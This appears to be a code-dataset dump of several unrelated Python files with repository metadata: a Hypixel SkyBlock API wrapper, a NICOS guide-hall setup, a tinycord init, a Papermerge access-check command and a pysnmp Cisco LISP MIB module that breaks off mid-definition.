stats['deaths_spirit_miniboss']) if 'deaths_spirit_miniboss' in stats else None self.spirit_chicken_deaths = int(stats['deaths_spirit_chicken']) if 'deaths_spirit_chicken' in stats else None self.spirit_sheep_deaths = int(stats['deaths_spirit_sheep']) if 'deaths_spirit_sheep' in stats else None self.crypt_undead_marius_kills = int( stats['kills_crypt_undead_marius']) if 'kills_crypt_undead_marius' in stats else None class SkyBlockObjective(object): r"""Represents a SkyBlock Objective. :param objective_name: The name of the objective. :type objective_name: str :param objective_data: The objective's data. :type objective_data: dict""" def __init__(self, objective_name: str, objective_data: dict): self.name = objective_name self.status = objective_data['status'] self.progress = objective_data['progress'] self.completed_at = datetime.datetime.fromtimestamp( objective_data['completed_at'] / 1000 ) if objective_data['completed_at'] != 0 else None class SkyBlockQuest(object): r"""Represents a SkyBlock quest. :param quest_name: The name of the quest. :type quest_name: str :param quest_data: The quest's data. :type quest_data: dict""" def __init__(self, quest_name: str, quest_data: dict): self.name = quest_name self.status = quest_data['status'] self.activated_at = datetime.datetime.fromtimestamp( quest_data['activated_at'] / 1000 ) self.completed_at = datetime.datetime.fromtimestamp( quest_data['completed_at'] / 1000 ) class SkyBlockSlayer(object): r"""Represents a SkyBlock slayer. :param slayer: The name of the slayer. :type slayer: str :param slayer_data: The slayer's data. :type slayer_data: dict""" def __init__(self, slayer: str, slayer_data: dict): self.slayer = slayer self.claimed_levels = slayer_data['claimed_levels'] self.xp = slayer_data['xp'] self.level = types[slayer](slayer_data['xp']) class SkyBlockPet(object): r"""Represents a SkyBlock pet. :param pet_data: The pet's data. :type pet_data: dict""" def __init__(self, pet_data: dict): self.uuid = pet_data['uuid'] self.type = pet_data['type'] self.xp = pet_data['exp'] self.active = pet_data['active'] self.tier = pet_data['tier'] self.held_item = pet_data['heldItem'] self.candy_used = pet_data['candyUsed'] self.skin = pet_data['skin'] class SkyBlockSkill(object): r"""Represents a SkyBlock skill. :param name: The skill's name. :type name: str :param skill_data: The skill's data. :type skill_data: dict""" def __init__(self, name, skill_data): self.name = name self.level = skill_data['level'] self.xp = skill_data['xp']
73.955645
120
0.733684
5,198
36,682
4.825702
0.076953
0.084835
0.11621
0.158468
0.638056
0.462805
0.320722
0.147385
0.102256
0.063028
0
0.000735
0.184287
36,682
495
121
74.105051
0.837578
0.052832
0
0.004728
0
0
0.321464
0.185294
0
0
0
0
0
1
0.014184
false
0
0.004728
0
0.033097
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdba7af199ee6c2c990e85c3f998b299c41d4413
604
py
Python
nicos_virt_mlz/reseda/setups/guidehall.py
jkrueger1/nicos
5f4ce66c312dedd78995f9d91e8a6e3c891b262b
[ "CC-BY-3.0", "Apache-2.0", "CC-BY-4.0" ]
12
2019-11-06T15:40:36.000Z
2022-01-01T16:23:00.000Z
nicos_virt_mlz/reseda/setups/guidehall.py
jkrueger1/nicos
5f4ce66c312dedd78995f9d91e8a6e3c891b262b
[ "CC-BY-3.0", "Apache-2.0", "CC-BY-4.0" ]
91
2020-08-18T09:20:26.000Z
2022-02-01T11:07:14.000Z
nicos_virt_mlz/reseda/setups/guidehall.py
jkrueger1/nicos
5f4ce66c312dedd78995f9d91e8a6e3c891b262b
[ "CC-BY-3.0", "Apache-2.0", "CC-BY-4.0" ]
6
2020-01-11T10:52:30.000Z
2022-02-25T12:35:23.000Z
description = 'FRM II Neutron guide hall west infrastructure devices' group = 'lowlevel' devices = dict( Sixfold = device('nicos.devices.generic.ManualSwitch', description = 'Sixfold shutter status', states = ('closed', 'open'), pollinterval = 60, maxage = 120, ), Crane = device('nicos.devices.generic.ManualMove', description = 'The position of the crane in the guide ' 'hall West measured from the east end', abslimits = (0, 60), pollinterval = 5, maxage = 30, unit = 'm', fmtstr = '%.1f', ), )
27.454545
69
0.584437
63
604
5.603175
0.698413
0.050992
0.073654
0.141643
0
0
0
0
0
0
0
0.028302
0.298013
604
21
70
28.761905
0.804245
0
0
0.105263
0
0
0.395695
0.109272
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdbb22ba6b4c3c39c0c15a90a8c254569dd0c0be
74
py
Python
tinycord/models/message/gateway/__init__.py
tinycord/tinycord
9e817452c1f2357878f07f8622f6240687470cad
[ "MIT" ]
8
2022-01-08T20:04:29.000Z
2022-03-21T19:12:19.000Z
tinycord/models/message/gateway/__init__.py
tinycord/tinycord
9e817452c1f2357878f07f8622f6240687470cad
[ "MIT" ]
null
null
null
tinycord/models/message/gateway/__init__.py
tinycord/tinycord
9e817452c1f2357878f07f8622f6240687470cad
[ "MIT" ]
1
2022-01-02T21:42:53.000Z
2022-01-02T21:42:53.000Z
from .reaction import ReactionGateway __all__ = [ "ReactionGateway" ]
14.8
37
0.743243
6
74
8.5
0.833333
0
0
0
0
0
0
0
0
0
0
0
0.175676
74
5
38
14.8
0.836066
0
0
0
0
0
0.2
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
bdbb658871214d92211c98f23c493a5bef0ef8d6
2,366
py
Python
papermerge/core/management/commands/checkaccess.py
MinchinWeb/papermerge
8a5f73207413a3ea8989d277e140d448baa35ca4
[ "Apache-2.0" ]
null
null
null
papermerge/core/management/commands/checkaccess.py
MinchinWeb/papermerge
8a5f73207413a3ea8989d277e140d448baa35ca4
[ "Apache-2.0" ]
null
null
null
papermerge/core/management/commands/checkaccess.py
MinchinWeb/papermerge
8a5f73207413a3ea8989d277e140d448baa35ca4
[ "Apache-2.0" ]
null
null
null
import logging from django.core.management.base import BaseCommand try: from django_tenants.utils import get_tenant_model except: get_tenant_model = None from django.db import connection from papermerge.core.models import ( BaseTreeNode, Access ) from papermerge.core.auth import ( create_access_perms ) logger = logging.getLogger(__name__) class Command(BaseCommand): help = """Lists/Updates Access Models associated with nodes. """ def add_arguments(self, parser): parser.add_argument( '--count', '-c', action="store_true", help="Count nodes with/without associated access model." ) parser.add_argument( '--update', '-u', action="store_true", help="Updated nodes without associated access model." ) parser.add_argument( '--schema-name', '-s', help="Run checkaccess for this schema." ) def run_count( self, ): total_count = BaseTreeNode.objects.count() without_access_count = BaseTreeNode.objects.filter( access__isnull=True ).count() print( f"total={total_count}, without_access={without_access_count}" ) def run_update( self ): perms = create_access_perms() for node in BaseTreeNode.objects.all(): if node.access_set.count() == 0: access = Access.objects.create( user=node.user, access_type='allow', node=node ) access.permissions.add(*perms) def handle(self, *args, **options): count = options.get( 'count', False ) update = options.get( 'update', False ) schema_name = options.get('schema_name', False) TenantModel = get_tenant_model() if schema_name: tenant_list = TenantModel.objects.filter(name=schema_name) else: tenant_list = TenantModel.objects.exclude(name="public") for tenant in tenant_list: connection.set_tenant(tenant) if count: self.run_count() elif update: self.run_update()
24.645833
73
0.554522
235
2,366
5.395745
0.353191
0.039432
0.033123
0.029968
0.070978
0.070978
0.070978
0
0
0
0
0.000653
0.352494
2,366
95
74
24.905263
0.827024
0
0
0.113924
0
0
0.136517
0.015638
0
0
0
0
0
1
0.050633
false
0
0.075949
0
0.151899
0.012658
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdbde2d938f424e96e16facd89ad398cdbed2930
46,214
py
Python
pysnmp-with-texts/CISCO-LISP-EXT-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
8
2019-05-09T17:04:00.000Z
2021-06-09T06:50:51.000Z
pysnmp-with-texts/CISCO-LISP-EXT-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
4
2019-05-31T16:42:59.000Z
2020-01-31T21:57:17.000Z
pysnmp-with-texts/CISCO-LISP-EXT-MIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
10
2019-04-30T05:51:36.000Z
2022-02-16T03:33:41.000Z
# # PySNMP MIB module CISCO-LISP-EXT-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-LISP-EXT-MIB # Produced by pysmi-0.3.4 at Wed May 1 12:04:38 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") SingleValueConstraint, ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion") ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt") AddressFamilyNumbers, = mibBuilder.importSymbols("IANA-ADDRESS-FAMILY-NUMBERS-MIB", "AddressFamilyNumbers") InetPortNumber, = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetPortNumber") lispMappingDatabaseTimeStamp, lispFeaturesMapCacheLimit, lispUseProxyEtrState, lispEidRegistrationSiteName, lispUseMapResolverState, lispFeaturesEntry, lispUseMapServerState, lispGlobalStatsEntry, LispAddressType = mibBuilder.importSymbols("LISP-MIB", "lispMappingDatabaseTimeStamp", "lispFeaturesMapCacheLimit", "lispUseProxyEtrState", "lispEidRegistrationSiteName", "lispUseMapResolverState", "lispFeaturesEntry", "lispUseMapServerState", "lispGlobalStatsEntry", "LispAddressType") NotificationGroup, ObjectGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ObjectGroup", "ModuleCompliance") Counter32, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, ObjectIdentity, NotificationType, ModuleIdentity, MibIdentifier, iso, Counter64, Unsigned32, IpAddress, Integer32, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "ObjectIdentity", "NotificationType", "ModuleIdentity", "MibIdentifier", "iso", "Counter64", "Unsigned32", "IpAddress", "Integer32", "Gauge32") TextualConvention, TruthValue, TimeStamp, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "TruthValue", "TimeStamp", "DisplayString") ciscoLispExtMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 825)) ciscoLispExtMIB.setRevisions(('2015-05-13 00:00',)) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): if mibBuilder.loadTexts: ciscoLispExtMIB.setRevisionsDescriptions(('Initial version of the CISCO-LISP-EXT-MIB module.',)) if mibBuilder.loadTexts: ciscoLispExtMIB.setLastUpdated('201505130000Z') if mibBuilder.loadTexts: ciscoLispExtMIB.setOrganization('Cisco Systems, Inc.') if mibBuilder.loadTexts: ciscoLispExtMIB.setContactInfo('Cisco Systems Customer Service Postal: 170 W Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: lisp-support@cisco.com') if mibBuilder.loadTexts: ciscoLispExtMIB.setDescription('This MIB is an extension to the IETF LISP-MIB module defined in RFC 7052. It contains Cisco defined managed objects and traps to support monitoring devices that support the Locator/ID Separation Protocol (LISP).') ciscoLispExtNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 0)) ciscoLispExtObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 1)) ciscoLispExtConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 2)) clispExtEidRegRlocMembershipTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1), ) if mibBuilder.loadTexts: clispExtEidRegRlocMembershipTable.setReference('LISP RLOC Membership Distribution http://tools.ietf.org/html/draft-kouvelas-lisp-rloc-membership') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipTable.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipTable.setDescription('This table lists the RLOC address gleaned from the map-server registration database for the purpose of RLOC membership. Entry on this table can also be added from configuration.') clispExtEidRegRlocMembershipEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1), ).setIndexNames((0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipInstanceID"), (0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipEidAfi"), (0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipRlocLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipRloc")) if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEntry.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEntry.setDescription('An entry describes an RLOC address gleaned from the map-server registration database.') clispExtEidRegRlocMembershipInstanceID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))) if mibBuilder.loadTexts: clispExtEidRegRlocMembershipInstanceID.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipInstanceID.setDescription('This object indicates the instance ID of the RLOC address.') clispExtEidRegRlocMembershipEidAfi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 2), AddressFamilyNumbers()) if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEidAfi.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipEidAfi.setDescription('This object indicates the IANA Address Family Identifier of the RLOC address.') clispExtEidRegRlocMembershipRlocLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39))) if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRlocLength.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRlocLength.setDescription('This object indicates the length of the RLOC address.') clispExtEidRegRlocMembershipRloc = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 4), LispAddressType()) if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRloc.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipRloc.setDescription('This object indicates the value of the RLOC address.') clispExtEidRegRlocMembershipMemberSince = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 5), TimeStamp()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtEidRegRlocMembershipMemberSince.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipMemberSince.setDescription('This object indicates the sysUpTime when this RLOC address was registered. If this information was present at the most recent reinitialization of the local management subsystem, then this object contains a zero value.') clispExtEidRegRlocMembershipGleaned = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 6), TruthValue()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtEidRegRlocMembershipGleaned.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipGleaned.setDescription('This object indicates whether the RLOC address was gleaned from a received EID prefix registration. If this object is true, then it means the RLOC address was gleaned.') clispExtEidRegRlocMembershipConfigured = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 1, 1, 7), TruthValue()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtEidRegRlocMembershipConfigured.setStatus('current') if mibBuilder.loadTexts: clispExtEidRegRlocMembershipConfigured.setDescription('This object indicates whether the RLOC address was added by configuration. If this object is true, then it means the RLOC address was configured.') clispExtRlocMembershipTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2), ) if mibBuilder.loadTexts: clispExtRlocMembershipTable.setReference('LISP RLOC Membership Distribution http://tools.ietf.org/html/draft-kouvelas-lisp-rloc-membership') if mibBuilder.loadTexts: clispExtRlocMembershipTable.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipTable.setDescription('This table lists the RLOC membership learned by the xTR. Entry can be learned from the map-server or from configuration.') clispExtRlocMembershipEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1), ).setIndexNames((0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipInstanceID"), (0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipEidAfi"), (0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipRlocLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtRlocMembershipRloc")) if mibBuilder.loadTexts: clispExtRlocMembershipEntry.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipEntry.setDescription('An entry describes the RLOC membership learned by the xTR.') clispExtRlocMembershipInstanceID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))) if mibBuilder.loadTexts: clispExtRlocMembershipInstanceID.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipInstanceID.setDescription('This object indicates the instance ID of the RLOC membership.') clispExtRlocMembershipEidAfi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 2), AddressFamilyNumbers()) if mibBuilder.loadTexts: clispExtRlocMembershipEidAfi.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipEidAfi.setDescription('This object indicates the IANA Address Family Identifier of the RLOC membership.') clispExtRlocMembershipRlocLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39))) if mibBuilder.loadTexts: clispExtRlocMembershipRlocLength.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipRlocLength.setDescription('This object indicates the length of the RLOC membership.') clispExtRlocMembershipRloc = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 4), LispAddressType()) if mibBuilder.loadTexts: clispExtRlocMembershipRloc.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipRloc.setDescription('This object indicates the value of the RLOC membership.') clispExtRlocMembershipMemberSince = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 5), TimeStamp()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtRlocMembershipMemberSince.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipMemberSince.setDescription('This object indicates the sysUpTime when the RLOC membership was added. If this information was present at the most recent reinitialization of the local management subsystem, then this object contains a zero value.') clispExtRlocMembershipDiscovered = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 6), TruthValue()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtRlocMembershipDiscovered.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipDiscovered.setDescription('This object indicates whether the RLOC membership was learned from the map-server. If this object is true, then it means the RLOC membership was learned.') clispExtRlocMembershipConfigured = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 2, 1, 7), TruthValue()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtRlocMembershipConfigured.setStatus('current') if mibBuilder.loadTexts: clispExtRlocMembershipConfigured.setDescription('This object indicates whether the RLOC membership was added by configuration. If this object is true, then it means the RLOC membership was configured.') clispExtReliableTransportSessionTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3), ) if mibBuilder.loadTexts: clispExtReliableTransportSessionTable.setReference('LISP Reliable Transport http://tools.ietf.org/html/draft-kouvelas-lisp-reliable-transport') if mibBuilder.loadTexts: clispExtReliableTransportSessionTable.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionTable.setDescription('This table lists the reliable transport sessions. The session may or may not be in established state.') clispExtReliableTransportSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1), ).setIndexNames((0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionPeerAddressLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionPeerAddress"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionPeerPort"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLocalAddressLength"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLocalAddress"), (0, "CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLocalPort")) if mibBuilder.loadTexts: clispExtReliableTransportSessionEntry.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionEntry.setDescription('An entry describes the reliable transport session.') clispExtReliableTransportSessionPeerAddressLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39))) if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddressLength.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddressLength.setDescription('This object indicates the length of the reliable transport session peer address.') clispExtReliableTransportSessionPeerAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 2), LispAddressType()) if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddress.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerAddress.setDescription('This object indicates the peer address of the reliable transport session.') clispExtReliableTransportSessionPeerPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 3), InetPortNumber()) if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerPort.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionPeerPort.setDescription('This object indicates the peer port of the reliable transport session.') clispExtReliableTransportSessionLocalAddressLength = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(5, 39))) if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddressLength.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddressLength.setDescription('This object indicates the length of the reliable transport session local address.') clispExtReliableTransportSessionLocalAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 5), LispAddressType()) if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddress.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalAddress.setDescription('This object indicates the local address of the reliable transport session.') clispExtReliableTransportSessionLocalPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 6), InetPortNumber()) if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalPort.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionLocalPort.setDescription('This object indicates the local port of the reliable transport session.') clispExtReliableTransportSessionState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("up", 1), ("down", 2)))).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionState.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionState.setDescription('This object indicates the state of the reliable transport session.') clispExtReliableTransportSessionLastStateChangeTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 8), TimeStamp()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionLastStateChangeTime.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionLastStateChangeTime.setDescription('This object indicates the sysUpTime of the last UP/DOWN state transition on the reliable transport session.') clispExtReliableTransportSessionEstablishmentRole = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("passive", 1), ("active", 2)))).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionEstablishmentRole.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionEstablishmentRole.setDescription("This object indicates the role of the reliable transport session. 'active' Connection was initiated locally by the LISP router. 'passive' Connection was accepted by the LISP router listening on the well-known local transport port.") clispExtReliableTransportSessionMessagesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 10), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesIn.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesIn.setDescription('This object indicates the number of messages received on this reliable transport session.') clispExtReliableTransportSessionMessagesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 11), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesOut.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionMessagesOut.setDescription('This object indicates the number of messages sent on this reliable transport session.') clispExtReliableTransportSessionBytesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 12), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesIn.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesIn.setDescription('This object indicates the number of bytes received on this reliable transport session.') clispExtReliableTransportSessionBytesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 3, 1, 13), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesOut.setStatus('current') if mibBuilder.loadTexts: clispExtReliableTransportSessionBytesOut.setDescription('This object indicates the number of bytes sent on this reliable transport session.') clispExtGlobalStatsTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 4), ) if mibBuilder.loadTexts: clispExtGlobalStatsTable.setStatus('current') if mibBuilder.loadTexts: clispExtGlobalStatsTable.setDescription('This table lists statistic to augment the lispGlobalStatsTable.') clispExtGlobalStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 4, 1), ) lispGlobalStatsEntry.registerAugmentions(("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsEntry")) clispExtGlobalStatsEntry.setIndexNames(*lispGlobalStatsEntry.getIndexNames()) if mibBuilder.loadTexts: clispExtGlobalStatsEntry.setStatus('current') if mibBuilder.loadTexts: clispExtGlobalStatsEntry.setDescription('An entry containing additional global statistics information.') clispExtGlobalStatsEidRegMoreSpecificEntryCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 4, 1, 1), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtGlobalStatsEidRegMoreSpecificEntryCount.setStatus('current') if mibBuilder.loadTexts: clispExtGlobalStatsEidRegMoreSpecificEntryCount.setDescription('This object indicates the number of EID prefix registration that are accepted as a result of the accept-more-specific configuration.') clispExtFeaturesTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5), ) if mibBuilder.loadTexts: clispExtFeaturesTable.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesTable.setDescription('This table contains additional LISP feature entries for lispFeaturesTable.') clispExtFeaturesEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1), ) lispFeaturesEntry.registerAugmentions(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEntry")) clispExtFeaturesEntry.setIndexNames(*lispFeaturesEntry.getIndexNames()) if mibBuilder.loadTexts: clispExtFeaturesEntry.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesEntry.setDescription('An entry containing additional LISP feature information.') clispExtFeaturesEidRegMoreSpecificWarningThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1, 1), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThreshold.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThreshold.setDescription('This object indicates the warning threshold for the accept-more-specific registration count on the map-server.') clispExtFeaturesEidRegMoreSpecificLimit = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1, 2), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimit.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimit.setDescription('This object indicates the accept-more-specific registration limit on the map-server.') clispExtFeaturesMapCacheWarningThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 5, 1, 3), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThreshold.setStatus('current') if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThreshold.setDescription('This object indicates the map-cache warning threshold on the xTR.') clispExtNotificationObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 6)) clispExtEidRegFailureCause = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 6, 1), 